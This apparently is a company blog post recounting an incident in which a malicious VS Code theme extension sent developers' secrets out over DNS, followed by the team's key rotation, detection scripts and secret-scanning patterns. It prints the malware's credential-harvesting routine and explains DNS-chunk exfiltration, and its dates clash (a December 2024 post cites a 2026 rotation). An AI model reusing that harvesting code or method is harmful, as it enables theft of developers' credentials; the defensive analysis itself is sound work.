
Security

Malicious VS Code extension: a seven-hour key-exfil scare

Jacob Molkenboer · Founder · A Brand New Company · 31 Dec 2024 · 9 min

The first alert came at 16:42 on a Wednesday in May. Outbound DNS queries from a MacBook in a Haarlem office to a four-word subdomain we had never registered, resolving to a Cloudflare Worker. The laptop belonged to a junior developer who had joined the team three weeks earlier.

She was in a 1:1 with her lead. We pulled her off the call, took the laptop off Wi-Fi, and started reading her Activity Monitor over her shoulder. Code Helper was sitting at 4% CPU, idle. The extensions panel showed twenty-two extensions installed. One of them, a small theme published a month earlier with around 1,200 downloads, was the one we had not seen before.

Two minutes in, we had the manifest open in a terminal. The extension shipped a single 11 KB script that activated on onStartupFinished. It read process.env, ~/.zsh_history, and ~/.bash_history, scanned every .env file under ~/Projects, and sent the lot to an attacker endpoint every fifteen minutes. The next send was due at 16:45.

We had three minutes.

What the extension actually did

The extension's manifest was unremarkable. A theme contribution, a couple of commands, an onStartupFinished activation event. The malicious code lived in a single file the marketplace did not flag on submission.

Stripped down, the relevant pattern looked like this:

const fs = require('node:fs');
const os = require('node:os');
const path = require('node:path');

const HOME = os.homedir();
const HISTORY = ['.zsh_history', '.bash_history', '.psql_history'];
const ROOT = path.join(HOME, 'Projects');

function harvest() {
  const env = { ...process.env };
  const histories = HISTORY
    .map(f => path.join(HOME, f))
    .filter(fs.existsSync)
    .map(f => fs.readFileSync(f, 'utf8'));
  const envFiles = walk(ROOT, /\.env(\.\w+)?$/);
  return { env, histories, envFiles };
}

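// walk() (recursive file search) and post() (the exfiltration step) are omitted from this excerpt.
setInterval(() => post(harvest()), 15 * 60 * 1000);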

The post function used dns.resolve4 on a domain the attacker controlled and exfiltrated payloads as base64 chunks encoded into successive A-record lookups. That is why our perimeter saw DNS, not HTTPS. A Cloudflare Worker on the other end reassembled the queries.

Two details are worth calling out. First, the marketplace listing was real, with a publisher account registered the previous October and four legitimate-looking extensions before this one. Second, the activation event was onStartupFinished, not a command, so the code ran on every launch without the developer doing anything. She had installed it once, three days earlier, while looking for a Solarized variant.
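The activation detail suggests a cheap check. A pure theme needs no code at all, so a manifest that contributes a theme and also declares an entry point, or that activates at startup, deserves a second look. Here is a minimal sketch of that check, assuming the extension's package.json has already been parsed. The function name and the example manifest are made up for illustration and are not taken from the extension we found:

```javascript
// Hypothetical helper: flags manifests that declare a theme but also ship
// code, and manifests whose code runs without any user action.
function manifestWarnings(manifest) {
  const warnings = [];
  const contributes = manifest.contributes || {};
  const events = manifest.activationEvents || [];
  const isTheme = Array.isArray(contributes.themes) && contributes.themes.length > 0;
  // `main` (desktop) and `browser` (web) are the manifest fields that point at code.
  const shipsCode = Boolean(manifest.main || manifest.browser);

  if (isTheme && shipsCode) {
    warnings.push('theme extension ships executable code');
  }
  // '*' activates at startup, 'onStartupFinished' shortly after; neither needs a command.
  const automatic = events.filter(e => e === '*' || e === 'onStartupFinished');
  if (shipsCode && automatic.length > 0) {
    warnings.push(`activates without user action: ${automatic.join(', ')}`);
  }
  return warnings;
}

// Illustrative manifest only.
const example = {
  name: 'some-theme',
  main: './out/extension.js',
  activationEvents: ['onStartupFinished'],
  contributes: { themes: [{ label: 'Some Theme', path: './themes/some.json' }] },
};
console.log(manifestWarnings(example));
```

Plenty of legitimate extensions activate at startup, so treat a warning here as a reason to read the code, not as a verdict.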

This pattern is not unique to one marketplace. Researchers have surfaced malicious npm packages, Chrome extensions, and VS Code themes that mirror popular work and ship a payload on first install. The attack surface for a small AI shop is the package and extension marketplaces, and the manifest review on those marketplaces is thin.
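On the detection side, DNS exfiltration of the kind described above tends to produce long, random-looking subdomain labels. Here is a rough sketch of a filter over logged query names, assuming you can export them from your resolver. The thresholds and the example.com names are placeholders, not tuned values:

```javascript
// Shannon entropy of a string, in bits per character.
function entropy(s) {
  const counts = {};
  for (const ch of s) counts[ch] = (counts[ch] || 0) + 1;
  let bits = 0;
  for (const n of Object.values(counts)) {
    const p = n / s.length;
    bits -= p * Math.log2(p);
  }
  return bits;
}

// Assumed thresholds: ordinary hostnames rarely have labels this long and this varied.
const MIN_LABEL_LENGTH = 30;
const MIN_ENTROPY = 4.0;

// Returns the labels of a query name that look like encoded payload chunks.
function suspiciousLabels(qname) {
  return qname
    .split('.')
    .filter(label => label.length >= MIN_LABEL_LENGTH && entropy(label) >= MIN_ENTROPY);
}

console.log(suspiciousLabels('www.example.com'));
console.log(suspiciousLabels('abcdefghijklmnopqrstuvwxyz0123456789.example.com'));
```

A filter like this will also flag some CDN and telemetry hostnames, so it is better suited to ranking queries for review than to blocking them outright.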

Mapping the blast radius

By 16:55 we had the list. Her .env files held nine secrets across four projects. In rough order of how badly we wanted them rotated:

- The Anthropic key for a prototype agent, with a $4,000 monthly budget on the org.
- The OpenAI key, a shared development key with no separate budget.
- Two Azure keys, for a Postgres and a Storage account in a sandbox subscription.
- An AWS access-key pair for a personal IAM user with read access to one S3 bucket.
- A GitHub personal access token with repo scope.
- A Slack bot token for our internal posting bot.
- A Stripe restricted key for a test-mode account.

And the part nobody wants to admit: the same Slack bot token was on three other developers' machines, hardcoded into one CI pipeline YAML file, and committed to a private repo six months earlier.

If the attacker had two hours of unsupervised use, the realistic damage was a four-figure Anthropic bill, posts into our internal Slack from a bot the team trusted, and read access to one S3 bucket. The Stripe key was restricted to test mode and not interesting. The GitHub PAT was the bad one, because it could clone every private repo we have.

Seven hours of rotation

We pulled the keys in the order above, starting with the Anthropic and OpenAI ones because those have a meter that runs by the second. The first rotation, on Anthropic, took eleven minutes end to end. The Slack bot token took six hours.

The slow part was not the API call. The API call is one curl. The Anthropic admin API exposes a single endpoint to deactivate a key:

curl "https://api.anthropic.com/v1/organizations/api_keys/$KEY_ID" \
  -X POST \
  -H "x-api-key: $ADMIN_KEY" \
  -H "anthropic-version: 2023-06-01" \
  -H "content-type: application/json" \
  -d '{"status": "inactive"}'

OpenAI's rotation flow has the same shape: create the new key, paste it into the secret store, revoke the old one. The slow part is everything that has to be fixed before the new key can be pasted in.

The Slack token lived in three CI pipelines. Two referenced it from a shared secret in our org settings; one had it inlined in the YAML. The inlined one was the one we missed first. After we rotated, that pipeline failed for forty minutes before the developer on call noticed. The bot started 404-ing in Slack at the same time. Anyone watching the channel could tell something was off.
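An inlined token like that one is findable before an incident. Here is a minimal sketch of a scan over a pipeline file's text, assuming a handful of simplified patterns built on well-known token prefixes. The pattern list, the function name, and the sample pipeline are illustrative, and a dedicated scanner such as gitleaks ships a far more complete rule set:

```javascript
// Simplified, assumed patterns based on well-known token prefixes.
const PATTERNS = [
  { kind: 'slack-bot-token', re: /xoxb-[A-Za-z0-9-]{10,}/ },
  { kind: 'github-pat', re: /ghp_[A-Za-z0-9]{36}/ },
  { kind: 'aws-access-key-id', re: /AKIA[0-9A-Z]{16}/ },
];

// Returns one hit per matching pattern per line, with 1-based line numbers.
function findHardcoded(text) {
  const hits = [];
  text.split('\n').forEach((line, i) => {
    for (const { kind, re } of PATTERNS) {
      if (re.test(line)) hits.push({ line: i + 1, kind });
    }
  });
  return hits;
}

// Made-up pipeline: one inlined placeholder token, one proper secret reference.
const pipeline = [
  'steps:',
  '  - name: notify',
  '    env:',
  '      SLACK_TOKEN: xoxb-000000000000-EXAMPLEONLY',
  '      OTHER_TOKEN: ${{ secrets.OTHER_TOKEN }}',
].join('\n');

console.log(findHardcoded(pipeline));
```

The reference to a shared secret on the last line is not flagged, which is the point: the scan separates values that live in the file from values that are looked up at run time.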

The GitHub PAT was the second slowest. Once it was revoked, three local clones started failing on git pull, and one Vercel build that used the PAT for a private npm dependency could no longer resolve it. The Vercel build was the only one anyone had actually documented.

By 23:38 every key was rotated, every pipeline green, the laptop reimaged, and a written incident note was in the team's shared Notion. Seven hours, twelve people involved at one point or another, one cancelled dinner.

Warning

If you cannot list every place a given secret is read from in under two minutes, you do not have an incident response plan. You have a treasure hunt.

The quarterly drill nobody runs

The drill is not complicated. We had written it down in 2024 and not run it once.

A quarterly key-rotation drill, scoped to ninety minutes, looks like this. One person picks a secret at random from the secrets inventory. The on-call rotates it. The rest of the team finds out by what breaks, fixes their side, and posts the fix in a thread. At the end of ninety minutes everything is back to green, or you have a written list of things to fix.

The drill teaches you four things. Where the secret is actually read from, not where you think it is. Who needs to be in the room. How long each rotation actually takes when you are not panicking. And which CI pipelines have hardcoded values you forgot about.
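The random pick is the only part of the drill that benefits from a script, because people tend to choose the secret they already know how to rotate. Here is a small sketch, assuming the secrets inventory has been loaded as an array of objects with id and read_by fields. The helper name and the two sample entries are hypothetical:

```javascript
// Hypothetical helper: picks one inventory entry at random and lists the
// places the team should watch for breakage during the drill.
function pickDrillSecret(inventory, random = Math.random) {
  if (inventory.length === 0) throw new Error('inventory is empty');
  const entry = inventory[Math.floor(random() * inventory.length)];
  return {
    id: entry.id,
    watch: (entry.read_by || []).map(r => `${r.service} (${r.location})`),
  };
}

// Made-up entries for illustration.
const inventory = [
  { id: 'slack_bot_internal', read_by: [{ service: 'ci-notify', location: 'ci:secret:SLACK_TOKEN' }] },
  { id: 'github_pat_build', read_by: [{ service: 'web-build', location: 'vercel:env:NPM_TOKEN' }] },
];

console.log(pickDrillSecret(inventory));
```

Passing the random source as a parameter is only there so the pick can be made repeatable in a test. In a real drill the default is what you want.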

For the inventory itself, we now keep a single YAML file in our internal ops repo with one entry per secret:

- id: anthropic_prod_agent_1
  vendor: anthropic
  rotation_method: admin_api
  read_by:
    - service: pier-agent
      location: vercel:env:ANTHROPIC_KEY
    - service: pier-agent-staging
      location: vercel:env:ANTHROPIC_KEY
  last_rotated: 2026-05-14
  rotation_minutes_observed: 11

The rotation_minutes_observed field is the one most teams skip. It is the only field that tells you what your real recovery time is, as opposed to the recovery time on a diagram.
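An inventory is only useful if its gaps are visible. Here is a sketch of a check over the parsed entries, assuming the field names from the entry above and a ninety-day staleness limit chosen to match a quarterly drill. The function name, the limit, and the second sample entry are assumptions for illustration:

```javascript
const MAX_AGE_DAYS = 90; // assumed: one quarter, matching the drill cadence
const MS_PER_DAY = 24 * 60 * 60 * 1000;

// Returns a human-readable list of what is missing or stale in the inventory.
function inventoryGaps(entries, today = new Date()) {
  const gaps = [];
  for (const e of entries) {
    if (!Array.isArray(e.read_by) || e.read_by.length === 0) {
      gaps.push(`${e.id}: no read_by locations recorded`);
    }
    if (typeof e.rotation_minutes_observed !== 'number') {
      gaps.push(`${e.id}: rotation time never measured`);
    }
    // A missing or unparseable date yields NaN, which also counts as stale.
    const ageDays = (today - new Date(e.last_rotated)) / MS_PER_DAY;
    if (!(ageDays <= MAX_AGE_DAYS)) {
      gaps.push(`${e.id}: not rotated in the last ${MAX_AGE_DAYS} days`);
    }
  }
  return gaps;
}

const inventory = [
  {
    id: 'anthropic_prod_agent_1',
    read_by: [
      { service: 'pier-agent', location: 'vercel:env:ANTHROPIC_KEY' },
      { service: 'pier-agent-staging', location: 'vercel:env:ANTHROPIC_KEY' },
    ],
    last_rotated: '2026-05-14',
    rotation_minutes_observed: 11,
  },
  // Made-up incomplete entry.
  { id: 'slack_bot_internal', read_by: [], last_rotated: '2025-11-01' },
];

console.log(inventoryGaps(inventory, new Date('2026-06-01')));
```

With the date fixed as in the example, the first entry passes and the second is reported three times, once for each missing or stale field.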

The local-machine defence is a two-minute writeup. Add a gitleaks pre-commit hook to every repo. Audit installed VS Code extensions monthly and remove the ones nobody can name. Keep secrets out of .env files where you can, and where you cannot, scope them down. Use restricted keys on every vendor that supports them: OpenAI, Anthropic, Stripe, and Slack all do, and the restricted variants would have made at least three of our nine keys far less useful to an attacker.
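The monthly extension audit can start as a short script. Here is a sketch that reads each installed extension's package.json and reports anything not on a team allowlist, assuming the default desktop install directory ~/.vscode/extensions. The function names are made up, and the manifest's modification time is only an approximation of the install date:

```javascript
const fs = require('node:fs');
const os = require('node:os');
const path = require('node:path');

// Default location for VS Code desktop; forks and portable installs differ.
const DEFAULT_DIR = path.join(os.homedir(), '.vscode', 'extensions');

// Lists installed extensions as { id, version, installed }.
function installedExtensions(dir = DEFAULT_DIR) {
  if (!fs.existsSync(dir)) return [];
  const found = [];
  for (const entry of fs.readdirSync(dir, { withFileTypes: true })) {
    if (!entry.isDirectory()) continue;
    const manifestPath = path.join(dir, entry.name, 'package.json');
    if (!fs.existsSync(manifestPath)) continue;
    const manifest = JSON.parse(fs.readFileSync(manifestPath, 'utf8'));
    found.push({
      id: `${manifest.publisher}.${manifest.name}`.toLowerCase(),
      version: manifest.version,
      installed: fs.statSync(manifestPath).mtime, // approximate install time
    });
  }
  return found;
}

// Returns the extensions whose publisher.name id is not on the allowlist.
function notOnAllowlist(extensions, allowlist) {
  const allowed = new Set(allowlist.map(id => id.toLowerCase()));
  return extensions.filter(e => !allowed.has(e.id));
}
```

A run would look like `notOnAllowlist(installedExtensions(), teamAllowlist)`, where teamAllowlist is whatever list of publisher.name ids the team has agreed on. Sorting the result by the installed date puts the most recent additions first, which is where a three-day-old theme would have shown up.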

What we would do on day one of a new engagement

Walking out of the office at midnight, the lead and I made a list of what would have made the day a one-hour story instead of a seven-hour one. The list had four items: the gitleaks hook, the monthly extension audit, the secrets inventory yaml, and a recurring calendar invite for the drill. None of them costs money. All of them require someone to write the first version.

When we built the AI agents for a 40-person agency in Amsterdam last year, the same shape of problem turned up around their Mailchimp and Klaviyo keys. We solved it by running a dry-run rotation on day one of the engagement and writing the inventory file before we shipped a single agent. It took half a day. It would have saved them four if they had needed it.

The smallest thing you can do today is open your secrets manager, pick the noisiest key, and try to revoke it. If revoking takes more than one person, more than one tab, or more than thirty minutes, you have just scoped your next ninety-minute drill.

Key takeaway

If you can't list every place a secret is read from in under two minutes, you don't have an incident response plan. You have a treasure hunt.

FAQ

How does an attacker exfiltrate data over DNS?

They split the payload into base64 chunks, encode each chunk as a subdomain label under a domain they control, and trigger a lookup for each name. Their nameserver logs the lookups, and the payload is reassembled from that log. Most perimeter firewalls allow outbound DNS by default.

Should we block the VS Code marketplace?

Usually not. An allowlist of approved extensions and a monthly audit are enough for most teams. The goal is to make sure a malicious install cannot reach a secret, not to stop developers from installing tools.

How long should a credential rotation actually take?

For one secret with the rotation documented, eleven minutes is realistic. For nine secrets across four projects with hardcoded references in CI, plan for half a day. Measure your own number once and write it down in the inventory.

What's the cheapest rotation drill?

One person picks a secret at random each quarter, the on-call rotates it, the rest of the team fixes what breaks in the next ninety minutes. No new tooling required, and the breakages tell you where your inventory is wrong.

Are restricted API keys worth the setup?

Yes. Anthropic, OpenAI, Stripe, Slack, and most other vendors let you scope a key to a workspace, a model, or a permission set. Three of our nine compromised keys would have been near-worthless to the attacker if scoped properly.
